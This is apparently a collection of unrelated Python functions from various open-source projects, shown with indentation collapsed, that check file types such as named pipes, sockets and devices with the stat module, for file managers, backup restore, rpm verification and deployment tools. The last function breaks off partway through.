def main(argv, result_handler=None): parser = argparser() args = parser.parse_args(argv) if args.library: for path in args.library: library_paths.append(path) if result_handler is None: if args.web: result_handler = print_result_json elif args.format == 'prolog': result_handler = lambda *a: print_result_prolog(*a, debug=args.debug) else: result_handler = lambda *a: print_result(*a, debug=args.debug) init_logger(args.verbose) if args.output is None: output = sys.stdout else: output = open(args.output, 'w') if args.timeout: start_timer(args.timeout) if len(args.filenames) == 0: mode = os.fstat(0).st_mode if stat.S_ISFIFO(mode) or stat.S_ISREG(mode): # stdin is piped or redirected args.filenames = ['-'] else: # stdin is terminal # No interactive input, exit print('ERROR: Expected a file or stream as input.\n', file=sys.stderr) parser.print_help() sys.exit(1) if args.logspace: semiring = SemiringLogProbability() else: semiring = SemiringProbability() if args.symbolic: args.koption = 'nnf' semiring = SemiringSymbolic() if args.propagate_weights: args.propagate_weights = semiring if args.combine: result = execute(args.filenames, args.koption, semiring, **vars(args)) retcode = result_handler(result, output) sys.exit(retcode) else: for filename in args.filenames: if len(args.filenames) > 1: print ('Results for %s:' % filename) result = execute(filename, args.koption, semiring, **vars(args)) retcode = result_handler(result, output) if len(args.filenames) == 1: sys.exit(retcode) if args.output is not None: output.close() if args.timeout: stop_timer()
def _create_via_common_rec(self, path, create_symlinks=True): if not self.mode: raise ApplyError('no metadata - cannot create path ' + path) # If the path already exists and is a dir, try rmdir. # If the path already exists and is anything else, try unlink. st = None try: st = xstat.lstat(path) except OSError as e: if e.errno != errno.ENOENT: raise if st: if stat.S_ISDIR(st.st_mode): try: os.rmdir(path) except OSError as e: if e.errno in (errno.ENOTEMPTY, errno.EEXIST): msg = 'refusing to overwrite non-empty dir ' + path raise Exception(msg) raise else: os.unlink(path) if stat.S_ISREG(self.mode): assert (self._recognized_file_type()) fd = os.open(path, os.O_CREAT | os.O_WRONLY | os.O_EXCL, 0o600) os.close(fd) elif stat.S_ISDIR(self.mode): assert (self._recognized_file_type()) os.mkdir(path, 0o700) elif stat.S_ISCHR(self.mode): assert (self._recognized_file_type()) os.mknod(path, 0o600 | stat.S_IFCHR, self.rdev) elif stat.S_ISBLK(self.mode): assert (self._recognized_file_type()) os.mknod(path, 0o600 | stat.S_IFBLK, self.rdev) elif stat.S_ISFIFO(self.mode): assert (self._recognized_file_type()) os.mknod(path, 0o600 | stat.S_IFIFO) elif stat.S_ISSOCK(self.mode): try: os.mknod(path, 0o600 | stat.S_IFSOCK) except OSError as e: if e.errno in (errno.EINVAL, errno.EPERM): s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) s.bind(path) else: raise elif stat.S_ISLNK(self.mode): assert (self._recognized_file_type()) if self.symlink_target and create_symlinks: # on MacOS, symlink() permissions depend on umask, and there's # no way to chown a symlink after creating it, so we have to # be careful here! oldumask = os.umask((self.mode & 0o777) ^ 0o777) try: os.symlink(self.symlink_target, path) finally: os.umask(oldumask) # FIXME: S_ISDOOR, S_IFMPB, S_IFCMP, S_IFNWK, ... see stat(2). else: assert (not self._recognized_file_type()) add_error('not creating "%s" with unrecognized mode "0x%x"\n' % (path, self.mode))
def initialize(): global is_package_manager_initialized if is_package_manager_initialized: log.debug("Package manager is already initialized") return # Validate package path global package_path assert(isinstance(package_path, basestring)) if os.path.isdir(package_path): try: os.listdir(package_path) except OSError: package_path = None log.error("Could not access package path") return else: log.debug("Could not find package path: " + package_path) try: os.makedirs(package_path) log.info("Created package path: " + package_path) except OSError: package_path = None log.error("Could not create package path") return # Validate package messenger pipe global package_messenger_pipe assert(isinstance(package_messenger_pipe, basestring)) if os.path.exists(package_messenger_pipe): if stat.S_ISFIFO(os.stat(package_messenger_pipe).st_mode): pass else: log.error("Pipe path exists, but it is not a pipe") package_messenger_pipe = None return else: package_messenger_pipe_dir = os.path.dirname(package_messenger_pipe) if not os.path.isdir(package_messenger_pipe_dir): try: os.makedirs(package_messenger_pipe_dir) log.info("Created directory: " + package_messenger_pipe_dir) except OSError: package_messenger_pipe = None log.error("Could not create directory for messenger pipe") return try: os.mkfifo(package_messenger_pipe) log.info("Created pipe: " + package_messenger_pipe) except OSError: package_messenger_pipe = None log.error("Could not create messenger pipe") return assert(stat.S_ISFIFO(os.stat(package_messenger_pipe).st_mode)) # Will not initialize package manager if package path is mis-configured if package_path is None: log.error("Package manager failed because package path is invalid") return # Initialization of package manager global package_message_queue if package_message_queue is None: package_message_queue = Queue() global package_lock if package_lock is None: package_lock = Lock() global package_thread if package_thread is None: package_thread = PackageThread(name="PackageThread") # PackageMessengerThread should start last because it triggers actions global package_messenger_thread if package_messenger_thread is None: if package_thread.isAlive(): package_messenger_thread = \ PackageMessengerThread( pipe_file=package_messenger_pipe, name="PackageMessengerThread" ) else: log.warning("Package messenger will not start") # Mark package manager as initialized is_package_manager_initialized = True log.info("Package manager is initialized")
def unix_item_ls(the_path, ls_format, root_folder=None): import grp import pwd the_parts = dict() if 'p' in ls_format or 'P' in ls_format: the_parts['p'] = the_path try: the_stats = os.lstat(the_path) for format_char in ls_format: if format_char == 'I': the_parts[format_char] = the_stats[stat.ST_INO] # inode number elif format_char == 'R': the_parts[format_char] = utils.unix_permissions_to_str( the_stats.st_mode) # permissions elif format_char == 'L': the_parts[format_char] = the_stats[stat.ST_NLINK] # num links elif format_char == 'u': try: the_parts[format_char] = str(the_stats[stat.ST_UID])[ 0] # unknown user name, get the number except Exception: the_parts[format_char] = "no_uid" elif format_char == 'U': try: the_parts[format_char] = pwd.getpwuid( the_stats[stat.ST_UID])[0] # user except KeyError: the_parts[format_char] = str(the_stats[stat.ST_UID])[ 0] # unknown user name, get the number except Exception: the_parts[format_char] = "no_uid" elif format_char == 'g': try: the_parts[format_char] = str(the_stats[stat.ST_GID])[ 0] # unknown group name, get the number except Exception: the_parts[format_char] = "no_gid" elif format_char == 'G': try: the_parts[format_char] = grp.getgrgid( the_stats[stat.ST_GID])[0] # group except KeyError: the_parts[format_char] = str(the_stats[stat.ST_GID])[ 0] # unknown group name, get the number except Exception: the_parts[format_char] = "no_gid" elif format_char == 'S': the_parts[format_char] = the_stats[ stat.ST_SIZE] # size in bytes elif format_char == 'T': the_parts[format_char] = time.strftime( "%Y/%m/%d-%H:%M:%S", time.gmtime( (the_stats[stat.ST_MTIME]))) # modification time elif format_char == 'C': if not (stat.S_ISLNK(the_stats.st_mode) or stat.S_ISDIR(the_stats.st_mode)): the_parts[format_char] = utils.get_file_checksum(the_path) else: the_parts[format_char] = "" elif format_char == 'P' or format_char == 'p': path_to_return = the_path if format_char == 'p' and root_folder is not None: path_to_return = os.path.relpath(the_path, start=root_folder) # E will bring us Extra data (path postfix) but we want to know if it's DIR in any case if stat.S_ISDIR(the_stats.st_mode) and 'D' in ls_format: path_to_return += '/' if 'E' in ls_format: if stat.S_ISLNK(the_stats.st_mode): path_to_return += '@' elif not stat.S_ISDIR(the_stats.st_mode) and ( the_stats.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)): path_to_return += '*' elif stat.S_ISSOCK(the_stats.st_mode): path_to_return += '=' elif stat.S_ISFIFO(the_stats.st_mode): path_to_return += '|' the_parts[format_char] = path_to_return except Exception as ex: pass return the_parts
def hardlinkable(mode): """return True if we support hardlinked items of this type""" return stat.S_ISREG(mode) or stat.S_ISBLK(mode) or stat.S_ISCHR( mode) or stat.S_ISFIFO(mode)
def _draw_directory(self): """Draw the contents of a directory""" if self.level > 0 and not self.settings.preview_directories: return base_color = ['in_browser'] self.win.move(0, 0) if not self.target.content_loaded: self.color(base_color) self.addnstr("...", self.wid) self.color_reset() return if self.main_column: base_color.append('main_column') if not self.target.accessible: self.color(base_color, 'error') self.addnstr("not accessible", self.wid) self.color_reset() return if self.target.empty(): self.color(base_color, 'empty') self.addnstr("empty", self.wid) self.color_reset() return self._set_scroll_begin() copied = [f.path for f in self.env.copy] ellipsis = self.ellipsis[self.settings.unicode_ellipsis] selected_i = self.target.pointer for line in range(self.hei): i = line + self.scroll_begin try: drawn = self.target.files[i] except IndexError: break if self.display_infostring and drawn.infostring \ and self.settings.display_size_in_main_column: infostring = str(drawn.infostring) + " " else: infostring = "" bad_info_color = None this_color = base_color + list(drawn.mimetype_tuple) text = drawn.basename tagged = self.fm.tags and drawn.realpath in self.fm.tags space = self.wid - len(infostring) if self.main_column: space -= 2 # if len(text) > space: # text = text[:space-1] + self.ellipsis if i == selected_i: this_color.append('selected') if drawn.marked: this_color.append('marked') if self.main_column: text = " " + text if tagged: this_color.append('tagged') if self.main_column: text = self.tagged_marker + text if drawn.is_directory: this_color.append('directory') else: this_color.append('file') if drawn.stat: mode = drawn.stat.st_mode if mode & stat.S_IXUSR: this_color.append('executable') if stat.S_ISFIFO(mode): this_color.append('fifo') if stat.S_ISSOCK(mode): this_color.append('socket') if drawn.is_device: this_color.append('device') if drawn.path in copied: this_color.append('cut' if self.env.cut else 'copied') if drawn.is_link: this_color.append('link') this_color.append(drawn.exists and 'good' or 'bad') string = drawn.basename from ranger.ext.widestring import WideString wtext = WideString(text) if len(wtext) > space: wtext = wtext[:space - 1] + ellipsis if self.main_column: if tagged: self.addstr(line, 0, str(wtext)) elif self.wid > 1: self.addstr(line, 1, str(wtext)) else: self.addstr(line, 0, str(wtext)) if infostring: x = self.wid - 1 - len(infostring) if infostring is BAD_INFO: bad_info_color = (x, len(infostring)) if x > 0: self.addstr(line, x, infostring) self.color_at(line, 0, self.wid, this_color) if bad_info_color: start, wid = bad_info_color self.color_at(line, start, wid, this_color, 'badinfo') if self.main_column and tagged and self.wid > 2: this_color.append('tag_marker') self.color_at(line, 0, len(self.tagged_marker), this_color) self.color_reset()
def _is_fifo(self): r = stat.S_ISFIFO(self.stat.st_mode) if r: self.type = 'fifo' return r
def get_file_metadata(path, hashes): """ Get a generator for the metadata of the file at system path @path. The generator yields, in order: 1. A boolean indicating whether the file exists. 2. st_dev, if the file exists. 3. Tuple of (S_IFMT(st_mode), file type as string), if the file exists. 4. st_size, if the file exists and is a regular file. Note that it may be 0 on some filesystems, so treat the value with caution. 5. st_mtime, if the file exists and is a regular file. 6. A dict of @hashes and their values, if the file exists and is a regular file. Special __size__ member is added unconditionally. Note that the generator acquires resources, and does not release them until terminated. Always make sure to pull it until StopIteration, or close it explicitly. """ try: # we want O_NONBLOCK to avoid blocking when opening pipes fd = os.open(path, os.O_RDONLY | os.O_NONBLOCK) except OSError as err: if err.errno == errno.ENOENT: exists = False opened = False elif err.errno == errno.ENXIO: # unconnected device or socket exists = True opened = False else: raise else: exists = True opened = True try: # 1. does it exist? yield exists # we can't provide any more data for a file that does not exist if not exists: return if opened: st = os.fstat(fd) else: st = os.stat(path) # 2. st_dev yield st.st_dev # 3. file type tuple if stat.S_ISREG(st.st_mode): ftype = 'regular file' elif stat.S_ISDIR(st.st_mode): ftype = 'directory' elif stat.S_ISCHR(st.st_mode): ftype = 'character device' elif stat.S_ISBLK(st.st_mode): ftype = 'block device' elif stat.S_ISFIFO(st.st_mode): ftype = 'named pipe' elif stat.S_ISSOCK(st.st_mode): ftype = 'UNIX socket' else: ftype = 'unknown' yield (stat.S_IFMT(st.st_mode), ftype) if not stat.S_ISREG(st.st_mode): if opened: os.close(fd) return # 4. st_size yield st.st_size # 5. st_mtime yield st.st_mtime f = io.open(fd, 'rb') except: if opened: os.close(fd) raise with f: # open() might have left the file as O_NONBLOCK # make sure to fix that fcntl.fcntl(fd, fcntl.F_SETFL, 0) # 5. checksums e_hashes = sorted(hashes) hashes = list(gemato.manifest.manifest_hashes_to_hashlib(e_hashes)) e_hashes.append('__size__') hashes.append('__size__') checksums = gemato.hash.hash_file(f, hashes) ret = {} for ek, k in zip(e_hashes, hashes): ret[ek] = checksums[k] yield ret
def isapipe(fd): fd = getattr(fd, 'fileno', lambda: fd)() return stat.S_ISFIFO(os.fstat(fd).st_mode)
def expand(self): import os import stat from BlockDevice import BlockDevice from CharacterDevice import CharacterDevice from File import File from Link import Link from NamedPipe import NamedPipe from Socket import Socket import journal debug = journal.debug("pyre.filesystem") files = [] subdirectories = [] root = self.path children = os.listdir(root) debug.log("directory '%s' has %d files" % (self.name, len(children))) count = 0 for name in children: count += 1 if name in self._children: continue pathname = os.path.join(root, name) # PORTABILITY: lstat is unix only mode = os.lstat(pathname)[stat.ST_MODE] if stat.S_ISDIR(mode): node = Directory(name, self) subdirectories.append(node) elif stat.S_ISREG(mode): node = File(name, self) files.append(node) elif stat.S_ISLNK(mode): node = Link(name, self) elif stat.S_ISSOCK(mode): node = Socket(name, self) elif stat.S_ISFIFO(mode): node = NamedPipe(name, self) elif stat.S_ISCHR(mode): node = CharacterDevice(name, self) elif stat.S_ISBLK(mode): node = BlockDevice(name, self) else: Firewall.hit("unknown file type: mode=%x" % mode) self._children[node.name] = node if not count % 1000: debug.log("processed %d files" % count) debug.log("total files processed: %d" % count) self._files = files self._subdirectories = subdirectories return subdirectories
def is_pipe_or_link(path): """Check for named pipe.""" return os.path.islink(path) or stat.S_ISFIFO(os.stat(path).st_mode)
def _cp(source, target, force, recursive, preserve, log, verbose, __recursion=0): # '__recursion' is an internal var used to track if this is a recursive # call to this function or not DEBUG = False if DEBUG: print("_cp(source=%r, target=%r, force=%r, recursive=%r, "\ "preserve=%r, log, verbose=%r)"\ % (source[0], target[0], force, recursive, preserve, verbose)) spath, sstat = source smode = sstat.st_mode tpath, tstat = target if stat.S_ISREG(smode): if not __recursion and tstat and stat.S_ISDIR(tstat.st_mode): tpath = os.path.join(tpath, _basename(spath)) try: tstat = os.stat(tpath) except OSError: tstat = None target = (tpath, tstat) if tstat: if _samefile(spath, tpath): raise OSError( 0, "`%s' and `%s' are the same file" % (spath, tpath), tpath) elif stat.S_ISDIR(tstat.st_mode): raise OSError( 0, "cannot overwrite directory `%s' with non-directory" % tpath, spath) if not os.access(spath, os.R_OK): raise OSError(0, "cannot open source for reading: permission denied", spath) if tstat and not os.access(tpath, os.W_OK): # Note: There is where GNU 'cp -i ...' would catch # "Permission denied" and offer: # cp: overwrite `<target>', overriding mode 0444? if force: os.chmod(tpath, 511) # octal 777 os.remove(tpath) tstat = None target = (tpath, tstat) else: raise OSError( 0, "cannot open target for writing: permission denied", tpath) if log and verbose: log("`%s' -> `%s'", spath, tpath) fsrc = open(spath, 'rb') try: ftarget = open(tpath, 'wb') try: #XXX Should this be done in chunks? ftarget.write(fsrc.read()) finally: ftarget.close() finally: fsrc.close() # Rules for setting permissions: # - if preserve is true: then preserve # - if target already existed: don't change permissions # - otherwise: set perms to perm(source) & ~umask if preserve: os.chmod(tpath, stat.S_IMODE(smode)) os.utime(tpath, (sstat.st_atime, sstat.st_mtime)) elif not tstat: # i.e. the target did not exist before the copy perm = stat.S_IMODE(smode) & ~_getumask() os.chmod(tpath, perm) elif stat.S_ISDIR(smode): if not recursive: raise OSError(0, "must specify 'recursive' to copy a directory", spath) if not __recursion and tstat and stat.S_ISDIR(tstat.st_mode): tpath = os.path.join(tpath, _basename(spath)) try: tstat = os.stat(tpath) except OSError: tstat = None target = (tpath, tstat) # Get list of files to copy over before creation of target dir # to avoid infinite loop if copying dir into itself. subfiles = os.listdir(spath) if not tstat: if log and verbose: log("`%s' -> `%s'", spath, tpath) os.mkdir(tpath) # Set attributes properly. if preserve: os.chmod(tpath, stat.S_IMODE(smode)) os.utime(tpath, (sstat.st_atime, sstat.st_mtime)) elif not tstat: # i.e. the target did not exist before the copy perm = stat.S_IMODE(smode) & ~_getumask() os.chmod(tpath, perm) for subfile in subfiles: subsource_path = os.path.join(spath, subfile) subsource = (subsource_path, os.stat(subsource_path)) subtarget_path = os.path.join(tpath, subfile) try: subtarget_stat = os.stat(subtarget_path) except OSError: subtarget_stat = None subtarget = (subtarget_path, subtarget_stat) _cp(subsource, subtarget, force, recursive, preserve, log, verbose, __recursion=1) elif stat.S_ISLNK(smode): raise NotImplementedError( "don't yet know how to copy symbolic links: `%s'" % spath) elif stat.S_ISCHR(smode): raise NotImplementedError( "don't yet know how to copy character special device files: `%s'" % spath) elif stat.S_ISBLK(smode): raise NotImplementedError( "don't yet know how to copy block special device files: `%s'" % spath) elif stat.S_ISFIFO(smode): raise NotImplementedError( "don't yet know how to copy a FIFO (named pipe): `%s'" % spath) elif stat.S_ISSOCK(smode): raise NotImplementedError("don't yet know how to copy a socket: `%s'" % spath) else: raise NotImplementedError("unknown file type: `%s' (mode bits: %s)" % (spath, oct(stat.S_IFMT(smode))))
def test_mkfifo(self): support.unlink(support.TESTFN) posix.mkfifo(support.TESTFN, stat.S_IRUSR | stat.S_IWUSR) self.assertTrue(stat.S_ISFIFO(posix.stat(support.TESTFN).st_mode))
def deploy(args): # create parser for CLI options parser = utils.base_parser(constants=C, usage="%prog playbook.yml", connect_opts=True, runas_opts=True, subset_opts=True, check_opts=True, diff_opts=True) parser.add_option( '-e', '--extra-vars', dest="extra_vars", action="append", help="set additional variables as key=value or YAML/JSON", default=[]) options, args = parser.parse_args(args) if len(args) == 0: parser.print_help(file=sys.stderr) return 1 inventory = ansible.inventory.Inventory(options.inventory) inventory.subset(options.subset) print "number of hosts: %s" % str(len(inventory.list_hosts())) if len(inventory.list_hosts()) == 0: raise errors.AnsibleError("provided hosts list is empty") sshpass = None sudopass = None options.ask_pass = options.ask_pass or C.DEFAULT_ASK_PASS if options.connection == "local": options.ask_pass = False options.ask_sudo_pass = options.ask_sudo_pass or C.DEFAULT_ASK_SUDO_PASS (sshpass, sudopass) = utils.ask_passwords(ask_pass=options.ask_pass, ask_sudo_pass=options.ask_sudo_pass) options.sudo_user = options.sudo_user or C.DEFAULT_SUDO_USER extra_vars = {} for extra_vars_opt in options.extra_vars: if extra_vars_opt.startswith("@"): # Argument is a YAML file (JSON is a subset of YAML) extra_vars = utils.combine_vars( extra_vars, utils.parse_yaml_from_file(extra_vars_opt[1:])) elif extra_vars_opt and extra_vars_opt[0] in '[{': # Arguments as YAML extra_vars = utils.combine_vars(extra_vars, utils.parse_yaml(extra_vars_opt)) else: # Arguments as Key-value extra_vars = utils.combine_vars(extra_vars, utils.parse_kv(extra_vars_opt)) playbook = underwear.__path__[0] + '/django-stack.yml' inventory.set_playbook_basedir(os.path.dirname(playbook)) stats = callbacks.AggregateStats() playbook_cb = callbacks.PlaybookCallbacks(verbose=utils.VERBOSITY) runner_cb = callbacks.PlaybookRunnerCallbacks(stats, verbose=utils.VERBOSITY) if not os.path.exists(playbook): raise errors.AnsibleError("the playbook: %s could not be found" % \ playbook) if not (os.path.isfile(playbook) or \ stat.S_ISFIFO(os.stat(playbook).st_mode)): raise errors.AnsibleError( \ "the playbook: %s does not appear to be a file" % playbook) pb = ansible.playbook.PlayBook(playbook=playbook, module_path=options.module_path, inventory=inventory, forks=options.forks, remote_user=options.remote_user, remote_pass=sshpass, callbacks=playbook_cb, runner_callbacks=runner_cb, stats=stats, timeout=options.timeout, transport=options.connection, sudo=options.sudo, sudo_user=options.sudo_user, sudo_pass=sudopass, extra_vars=extra_vars, private_key_file=options.private_key_file, only_tags=[ 'all', ], skip_tags=None, check=options.check, diff=options.diff) failed_hosts = [] unreachable_hosts = [] try: pb.run() hosts = sorted(pb.stats.processed.keys()) print hosts display(callbacks.banner("PLAY RECAP")) playbook_cb.on_stats(pb.stats) for h in hosts: t = pb.stats.summarize(h) if t['failures'] > 0: failed_hosts.append(h) if t['unreachable'] > 0: unreachable_hosts.append(h) retries = failed_hosts + unreachable_hosts if len(retries) > 0: filename = pb.generate_retry_inventory(retries) if filename: display(" to retry, use: --limit @%s\n" % filename) for h in hosts: t = pb.stats.summarize(h) display("%s : %s %s %s %s" % (hostcolor(h, t), colorize('ok', t['ok'], 'green'), colorize('changed', t['changed'], 'yellow'), colorize('unreachable', t['unreachable'], 'red'), colorize('failed', t['failures'], 'red')), screen_only=True) display("%s : %s %s %s %s" % (hostcolor(h, t, False), colorize('ok', t['ok'], None), colorize('changed', t['changed'], None), colorize('unreachable', t['unreachable'], None), colorize('failed', t['failures'], None)), log_only=True) print "" if len(failed_hosts) > 0: return 2 if len(unreachable_hosts) > 0: return 3 except errors.AnsibleError, e: display("ERROR: %s" % e, color='red') return 1
def rpm_verify_file(fileinfo, rpmlinktos, omitmask): """ Verify all the files in a package. Returns a list of error flags, the file type and file name. The list entries are strings that are the same as the labels for the bitwise flags used in the C code. """ (fname, fsize, fmode, fmtime, fflags, frdev, finode, fnlink, fstate, \ vflags, fuser, fgroup, fmd5) = fileinfo # 1. rpmtsRootDir stuff. What does it do and where to I get it from? file_results = [] flags = vflags # Check to see if the file was installed - if not pretend all is ok. # This is what the rpm C code does! if fstate != rpm.RPMFILE_STATE_NORMAL: return file_results # Get the installed files stats try: lstat = os.lstat(fname) except OSError: if not (fflags & (rpm.RPMFILE_MISSINGOK | rpm.RPMFILE_GHOST)): file_results.append('RPMVERIFY_LSTATFAIL') #file_results.append(fname) return file_results # 5. Contexts? SELinux stuff? # Setup what checks to do. This is straight out of the C code. if stat.S_ISDIR(lstat.st_mode): flags &= DIR_FLAGS elif stat.S_ISLNK(lstat.st_mode): flags &= LINK_FLAGS elif stat.S_ISFIFO(lstat.st_mode): flags &= FIFO_FLAGS elif stat.S_ISCHR(lstat.st_mode): flags &= CHR_FLAGS elif stat.S_ISBLK(lstat.st_mode): flags &= BLK_FLAGS else: flags &= REG_FLAGS if (fflags & rpm.RPMFILE_GHOST): flags &= GHOST_FLAGS flags &= ~(omitmask | RPMVERIFY_FAILURES) # 8. SELinux stuff. prelink_size = 0 if flags & RPMVERIFY_MD5: prelink_md5, prelink_size = prelink_md5_check(fname) if prelink_md5 == False: file_results.append('RPMVERIFY_MD5') file_results.append('RPMVERIFY_READFAIL') elif prelink_md5 != fmd5: file_results.append('RPMVERIFY_MD5') if flags & RPMVERIFY_LINKTO: linkto = os.readlink(fname) if not linkto: file_results.append('RPMVERIFY_READLINKFAIL') file_results.append('RPMVERIFY_LINKTO') else: if len(rpmlinktos) == 0 or linkto != rpmlinktos: file_results.append('RPMVERIFY_LINKTO') if flags & RPMVERIFY_FILESIZE: if not (flags & RPMVERIFY_MD5): # prelink check hasn't been done. prelink_size = prelink_size_check(fname) if (prelink_size != 0): # This is a prelinked file. if (prelink_size != fsize): file_results.append('RPMVERIFY_FILESIZE') elif lstat.st_size != fsize: # It wasn't a prelinked file. file_results.append('RPMVERIFY_FILESIZE') if flags & RPMVERIFY_MODE: metamode = fmode filemode = lstat.st_mode # Comparing the type of %ghost files is meaningless, but perms are ok. if fflags & rpm.RPMFILE_GHOST: metamode &= ~0xf000 filemode &= ~0xf000 if (stat.S_IFMT(metamode) != stat.S_IFMT(filemode)) or \ (stat.S_IMODE(metamode) != stat.S_IMODE(filemode)): file_results.append('RPMVERIFY_MODE') if flags & RPMVERIFY_RDEV: if (stat.S_ISCHR(fmode) != stat.S_ISCHR(lstat.st_mode) or stat.S_ISBLK(fmode) != stat.S_ISBLK(lstat.st_mode)): file_results.append('RPMVERIFY_RDEV') elif (s_isdev(fmode) & s_isdev(lstat.st_mode)): st_rdev = lstat.st_rdev if frdev != st_rdev: file_results.append('RPMVERIFY_RDEV') if flags & RPMVERIFY_MTIME: if lstat.st_mtime != fmtime: file_results.append('RPMVERIFY_MTIME') if flags & RPMVERIFY_USER: try: user = pwd.getpwuid(lstat.st_uid)[0] except KeyError: user = None if not user or not fuser or (user != fuser): file_results.append('RPMVERIFY_USER') if flags & RPMVERIFY_GROUP: try: group = grp.getgrgid(lstat.st_gid)[0] except KeyError: group = None if not group or not fgroup or (group != fgroup): file_results.append('RPMVERIFY_GROUP') return file_results
def main(configcode=''): mountmap = sshfsmountmap() command, originalargs = os.path.basename(sys.argv[0]), sys.argv[1:] envpassthrough = dict() environment = dict(os.environ) stdin_is_pipe = stat.S_ISFIFO(os.fstat(0).st_mode) # Configuration defaults translate_all_arguments = False preserve_isatty = False coerce_remote_execution = False # Figure out where the current working directory is on the remote system. cwdtranslation = translatepath(os.getcwd(), mountmap) if cwdtranslation: sshlogin, remotecwd, basemountpoint = cwdtranslation sshhost = sshlogin.split('@')[0] if '@' in sshlogin else sshlogin else: sshlogin = None # First execution of configuration code prior to processing arguments. pre_process_config = True exec(configcode) remoteargs = list() for argument in originalargs: translation = translatepath(argument, mountmap) if not translation: remoteargs.append(argument) continue login, transpath, argmountpoint = translation arghost = login.split('@')[0] if '@' in login else login # Paths used with coerced execution must be absolute if coerce_remote_execution and not cwdtranslation: argument = transpath if not sshlogin and coerce_remote_execution: sshlogin = login basemountpoint = argmountpoint sshhost = sshlogin.split('@')[0] if '@' in sshlogin else sshlogin elif sshlogin and arghost != sshhost: print("SSHFS host mismatch.", file=sys.stderr) exit(EXIT_SSHFS_HOST_MISMATCH) # If the argument is an absolute path or a relative path that crosses # over to a different SSHFS mount point, use an absolute path for the # remote command. if sshlogin and basemountpoint != argmountpoint or argument[0] == '/': remoteargs.append(transpath) else: if cwdtranslation: # Ensure the mount point is not referenced by its local name, # e.g. ../../mountpoint/subfolder. If is is, switch to an # absolute path. argupdirs = os.path.normpath(argument).split('/').count('..') highestreference = os.path.abspath(('../' * (argupdirs - 1))) refmount = mountmap.get(highestreference) if refmount: remotebasename = os.path.basename(refmount[1]) localmountname = os.path.basename(highestreference) if argupdirs and refmount and remotebasename != localmountname: remoteargs.append(transpath) continue remoteargs.append(argument) # Second execution of configuration code after processing arguments. pre_process_config = False exec(configcode) if sshlogin: # If the command should be executed on a remote server, generate the # execution string to pass into the shell. executed = listtoshc([command] + remoteargs) # Prepend environment variable declarations for variable, value in envpassthrough.iteritems(): executed = '%s=%s %s' % (variable, pipes.quote(value), executed) if cwdtranslation: # If the current working directory is inside an SSHFS mount, cd # into the corresponding remote directory first. Why the brackets? # When data is piped into cd without cd being in a command group, # cd will not work: # # ~% echo example | cd / && pwd # /home/jameseric # ~% echo example | { cd / && pwd; } # / # quotedremotecwd = pipes.quote(remotecwd) sshcommand = '{ cd %s && %s; }' % (quotedremotecwd, executed) else: sshcommand = executed ttys = [fd.isatty() for fd in (sys.stdin, sys.stdout, sys.stderr)] if any(ttys): ttyoption = '-t' if not preserve_isatty: # Only create a tty if stdin and stdout are attached a tty. ttyoption = '-t' if all(ttys[0:2]) else '-T' elif not all(ttys): # Do some kludgey stuff to make isatty for the remote process # match the what sshfsexec sees. if not ttys[0]: sshcommand = 'stty -echo; /bin/cat | ' + sshcommand ttyoption = '-tt' if not ttys[1]: sshcommand += ' | /bin/cat' if not ttys[2]: sshcommand = ( 'exec 3>&1; %s 2>&1 >&3 3>&- | /bin/cat >&2' % sshcommand) else: ttyoption = '-T' argv = [SSH_BINARY] if ttyoption == '-T': argv += ['-e', 'none'] argv += [sshlogin, ttyoption, sshcommand] else: # If the command does not interact with any SSHFS-mounted paths, run # the executable that the script replaced. path = os.environ.get('PATH', '') while path: replacedbinary = which(command, path) if replacedbinary: if os.path.samefile(__file__, replacedbinary): if ':' in path: _, path = path.split(':', 1) continue else: break print("sshfsexec: %s: command not found" % command) exit(EXIT_COMMAND_NOT_FOUND) argv = [replacedbinary] + originalargs os.execvpe(argv[0], argv, environment)
def update_db_timer_slot(self): if self.update_db_timer.interval() != GlobalVar.DB_UPDATE_INTERVAL: self.update_db_timer.setInterval(GlobalVar.DB_UPDATE_INTERVAL) self.flag.restart_flag = False if self.flag.quit_flag: return if self.qqueue.empty(): self.update_db_timer.start() return settings = QSettings(QSettings.IniFormat, QSettings.UserScope, ORGANIZATION_NAME, ALLICATION_NAME) excluded_folders = settings.value('Excluded_folders', type=str, defaultValue='') try: self.skip_dir = list(excluded_folders) except Exception as e: logger.error('Wrong format: Excluded folders, ' + str(e)) self.skip_dir = [] while not self.qqueue.empty(): if self.flag.restart_flag: break if self.flag.quit_flag: return self.mutex.lock() if self.qqueue.empty(): self.mutex.unlock() continue # break _item = self.qqueue.get() self.mutex.unlock() # self.con.commit() # TODO: try catch try: root_path = _item['path'] uuid = _item['uuid'] if self.flag.quit_flag: break root_path = _unicode(root_path) root_path_len = len(root_path) if len(root_path) > 1 else 0 print('Enter root_path: %s' % root_path) if root_path in self.skip_dir: print('Dir %s skipped.' % root_path) continue if (not os.path.exists(root_path)): logger.warning("Dir %s does not exists." % root_path) self.show_statusbar_warning_msg_SIGNAL.emit( "Dir %s does not exists." % root_path) continue # try: if os.lstat(root_path).st_dev != 0: device_maj_num = os.major(os.lstat(root_path).st_dev) device_min_num = os.minor(os.lstat(root_path).st_dev) else: device_maj_num = device_min_num = 0 # uuid = self.UUID_class.deviceID_to_UUID((device_maj_num, device_min_num)) fstype = SystemDevices.deviceDict[(device_maj_num, device_min_num)]['fstype'] table_name = uuid self.init_table(table_name, clear_table=False) insert_db_thread = Insert_db_thread( uuid, parent=self, sql_insert_queue=self.sql_insert_queue, sql_insert_mutex=self.sql_insert_mutex, sql_insert_condition=self.sql_insert_condition) insert_db_thread.update_progress_SIGNAL.connect( self.parent().on_db_progress_update, QtCore.Qt.QueuedConnection) insert_db_thread.start() enable_MFT_parser = GlobalVar.USE_MFT_PARSER # self.update_progress_SIGNAL.emit(-1, -1, uuid) # start MFT_parser_successful_flag = False if fstype == "ntfs" and enable_MFT_parser: try: MFT_file_path = os.path.join(root_path, "$MFT") logger.info("Enter NTFS folder: %s" % root_path) if not os.path.exists(MFT_file_path): logger.warning("$MFT file does not exists." % MFT_file_path) raise Exception("$MFT file does not exists." % MFT_file_path) # FIXME: In linux, cannot get the latest MFT; "sync" does not work. Linux cache? # settings = QSettings(QSettings.IniFormat, QSettings.UserScope, ORGANIZATION_NAME, ALLICATION_NAME) enable_C_MFT_parser = GlobalVar.USE_MFT_PARSER_CPP logger.info("enable_C_MFT_parser: " + str(enable_C_MFT_parser)) if enable_C_MFT_parser: insert_db_thread.pre_quit( commit_progress_flag=False) pass insert_db_thread.update_progress_SIGNAL.emit( 1, -3, uuid) 